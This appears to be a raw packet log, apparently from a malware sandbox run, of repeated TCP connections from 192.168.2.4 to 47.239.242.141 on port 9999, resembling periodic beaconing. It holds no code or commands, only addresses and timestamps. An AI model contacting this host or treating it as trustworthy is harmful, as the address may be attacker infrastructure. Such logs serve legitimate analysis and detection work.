Oct 8, 2024 04:19:03.801062107 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801086903 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801089048 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801107883 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801114082 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801134109 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801172972 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801403046 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801417112 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801430941 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801448107 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801465988 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801482916 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801493883 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801506996 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801532030 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801534891 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801553965 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801568985 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801577091 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801590919 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801604986 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801620007 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801632881 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801656008 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801661015 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801675081 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801687956 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801703930 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801721096 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801737070 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801738977 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801753998 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801779985 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801793098 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801795006 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801809072 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.801834106 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.801846981 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802325964 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802340031 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802352905 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802378893 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802398920 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802464962 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802500963 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802506924 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802520037 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802535057 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802536964 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802553892 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802565098 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802578926 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802593946 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802608967 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802613020 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802623987 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802629948 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802639961 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802640915 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802656889 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802659035 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802671909 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802675962 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802686930 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802686930 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802705050 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802705050 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.802721024 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.802741051 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.803276062 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803288937 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803298950 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803314924 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803323984 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803333044 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803343058 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803427935 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803437948 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803448915 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803457975 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.803500891 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.803574085 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.888078928 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888089895 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888122082 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888166904 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888176918 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888186932 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888233900 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888243914 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888252974 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888266087 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.888266087 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.888266087 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.888266087 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.888299942 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.888299942 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.888322115 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888331890 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888339996 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888350964 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.888362885 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.888392925 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.889010906 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.889019966 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.889030933 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.889060974 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.889076948 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.889076948 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.889086962 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.889095068 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.889105082 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.889115095 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.889142036 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.889149904 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.889174938 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:03.889183044 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:03.889213085 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:04.023900986 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.023916006 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.023932934 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.023942947 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.023953915 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.023966074 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.023974895 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.024235964 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:04.024672985 CEST	49730	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:04.029551983 CEST	9999	49730	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.032618046 CEST	49731	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:04.037553072 CEST	9999	49731	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.037758112 CEST	49731	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:04.037848949 CEST	49731	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:04.042692900 CEST	9999	49731	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.967909098 CEST	9999	49731	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.967936039 CEST	9999	49731	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:04.968087912 CEST	49731	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:04.968087912 CEST	49731	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:04.968189955 CEST	49731	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:04.973087072 CEST	9999	49731	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:05.075870991 CEST	49732	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:05.080912113 CEST	9999	49732	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:05.081016064 CEST	49732	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:05.081103086 CEST	49732	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:05.085890055 CEST	9999	49732	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:05.971898079 CEST	9999	49732	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:05.971925974 CEST	9999	49732	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:05.972057104 CEST	49732	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:05.972057104 CEST	49732	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:05.972115993 CEST	49732	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:05.976934910 CEST	9999	49732	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:06.075835943 CEST	49733	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:06.080842972 CEST	9999	49733	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:06.080924988 CEST	49733	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:06.081027985 CEST	49733	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:06.085789919 CEST	9999	49733	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:06.998413086 CEST	9999	49733	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:06.998483896 CEST	49733	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:06.998572111 CEST	9999	49733	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:06.998611927 CEST	49733	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:07.109081984 CEST	49733	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:07.109447002 CEST	49734	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:07.114185095 CEST	9999	49733	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:07.114343882 CEST	9999	49734	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:07.114409924 CEST	49734	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:07.114514112 CEST	49734	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:07.119430065 CEST	9999	49734	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:08.053106070 CEST	9999	49734	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:08.053189039 CEST	49734	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:08.053204060 CEST	9999	49734	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:08.053266048 CEST	49734	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:08.053385019 CEST	49734	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:08.058135033 CEST	9999	49734	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:08.171503067 CEST	49735	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:08.176820993 CEST	9999	49735	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:08.176954031 CEST	49735	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:08.219326973 CEST	49735	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:08.224656105 CEST	9999	49735	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:09.108695030 CEST	9999	49735	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:09.108824015 CEST	49735	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:09.109071016 CEST	9999	49735	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:09.109188080 CEST	49735	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:09.216561079 CEST	49735	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:09.216859102 CEST	49736	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:09.221592903 CEST	9999	49735	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:09.221610069 CEST	9999	49736	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:09.221688986 CEST	49736	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:09.221836090 CEST	49736	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:09.228925943 CEST	9999	49736	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:10.121105909 CEST	9999	49736	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:10.121196985 CEST	49736	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:10.121270895 CEST	9999	49736	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:10.121314049 CEST	49736	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:10.231493950 CEST	49736	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:10.231822968 CEST	49737	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:10.236396074 CEST	9999	49736	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:10.236648083 CEST	9999	49737	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:10.236721992 CEST	49737	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:10.241225958 CEST	49737	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:10.246983051 CEST	9999	49737	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:11.127326965 CEST	9999	49737	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:11.127343893 CEST	9999	49737	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:11.127428055 CEST	49737	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:11.127428055 CEST	49737	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:11.127877951 CEST	49737	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:11.132950068 CEST	9999	49737	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:11.231743097 CEST	49738	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:11.236850977 CEST	9999	49738	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:11.236938953 CEST	49738	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:11.237096071 CEST	49738	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:11.242156982 CEST	9999	49738	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:12.179554939 CEST	9999	49738	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:12.179599047 CEST	9999	49738	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:12.179763079 CEST	49738	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:12.179763079 CEST	49738	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:12.179838896 CEST	49738	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:12.184591055 CEST	9999	49738	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:12.294852972 CEST	49739	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:12.299819946 CEST	9999	49739	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:12.299896955 CEST	49739	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:12.300080061 CEST	49739	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:12.305139065 CEST	9999	49739	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:13.204835892 CEST	9999	49739	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:13.204854012 CEST	9999	49739	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:13.204932928 CEST	49739	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:13.205070019 CEST	49739	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:13.209835052 CEST	9999	49739	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:13.309796095 CEST	49740	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:13.314867020 CEST	9999	49740	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:13.314945936 CEST	49740	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:13.315079927 CEST	49740	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:13.319849014 CEST	9999	49740	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:14.236296892 CEST	9999	49740	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:14.236430883 CEST	49740	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:14.236435890 CEST	9999	49740	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:14.236479998 CEST	49740	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:14.236566067 CEST	49740	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:14.241353035 CEST	9999	49740	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:14.341289043 CEST	49741	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:14.346515894 CEST	9999	49741	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:14.346755028 CEST	49741	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:14.346755981 CEST	49741	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:14.351663113 CEST	9999	49741	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:15.280091047 CEST	9999	49741	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:15.280165911 CEST	9999	49741	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:15.280380011 CEST	49741	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:15.280380964 CEST	49741	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:15.280380964 CEST	49741	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:15.285769939 CEST	9999	49741	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:15.388248920 CEST	49742	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:15.393275976 CEST	9999	49742	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:15.393372059 CEST	49742	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:15.393472910 CEST	49742	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:15.398319006 CEST	9999	49742	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:16.312841892 CEST	9999	49742	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:16.312858105 CEST	9999	49742	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:16.312928915 CEST	49742	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:16.312928915 CEST	49742	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:16.313083887 CEST	49742	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:16.321767092 CEST	9999	49742	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:16.419305086 CEST	49743	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:16.424331903 CEST	9999	49743	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:16.424396038 CEST	49743	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:16.424582005 CEST	49743	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:16.429527998 CEST	9999	49743	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:17.340904951 CEST	9999	49743	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:17.340925932 CEST	9999	49743	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:17.340970993 CEST	49743	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:17.341006041 CEST	49743	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:17.341249943 CEST	49743	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:17.346175909 CEST	9999	49743	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:17.450571060 CEST	49744	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:17.455646038 CEST	9999	49744	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:17.455725908 CEST	49744	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:17.455852985 CEST	49744	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:17.460674047 CEST	9999	49744	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:18.389527082 CEST	9999	49744	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:18.389588118 CEST	9999	49744	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:18.389585972 CEST	49744	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:18.389874935 CEST	49744	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:18.497201920 CEST	49744	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:18.497616053 CEST	49746	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:18.502023935 CEST	9999	49744	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:18.502449036 CEST	9999	49746	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:18.502686024 CEST	49746	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:18.502825975 CEST	49746	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:18.507880926 CEST	9999	49746	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:19.415683031 CEST	9999	49746	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:19.415705919 CEST	9999	49746	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:19.415868998 CEST	49746	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:19.415997982 CEST	49746	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:19.420835972 CEST	9999	49746	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:19.528779984 CEST	49750	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:19.533828974 CEST	9999	49750	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:19.533915043 CEST	49750	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:19.534092903 CEST	49750	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:19.539069891 CEST	9999	49750	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:20.458882093 CEST	9999	49750	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:20.458898067 CEST	9999	49750	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:20.459124088 CEST	49750	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:20.459124088 CEST	49750	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:20.464042902 CEST	9999	49750	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:20.575694084 CEST	49752	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:20.580899000 CEST	9999	49752	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:20.581020117 CEST	49752	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:20.581207037 CEST	49752	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:20.586180925 CEST	9999	49752	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:21.516032934 CEST	9999	49752	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:21.516150951 CEST	49752	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:21.516452074 CEST	9999	49752	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:21.516645908 CEST	49752	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:21.622270107 CEST	49752	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:21.622711897 CEST	57241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:21.627094984 CEST	9999	49752	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:21.627496004 CEST	9999	57241	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:21.627582073 CEST	57241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:21.627727032 CEST	57241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:21.632539988 CEST	9999	57241	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:22.527772903 CEST	9999	57241	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:22.527791023 CEST	9999	57241	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:22.527862072 CEST	57241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:22.527862072 CEST	57241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:22.527998924 CEST	57241	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:22.532903910 CEST	9999	57241	47.239.242.141	192.168.2.4
Oct 8, 2024 04:19:22.638464928 CEST	57242	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:19:22.643462896 CEST	9999	57242	47.239.242.141	192.168.2.4
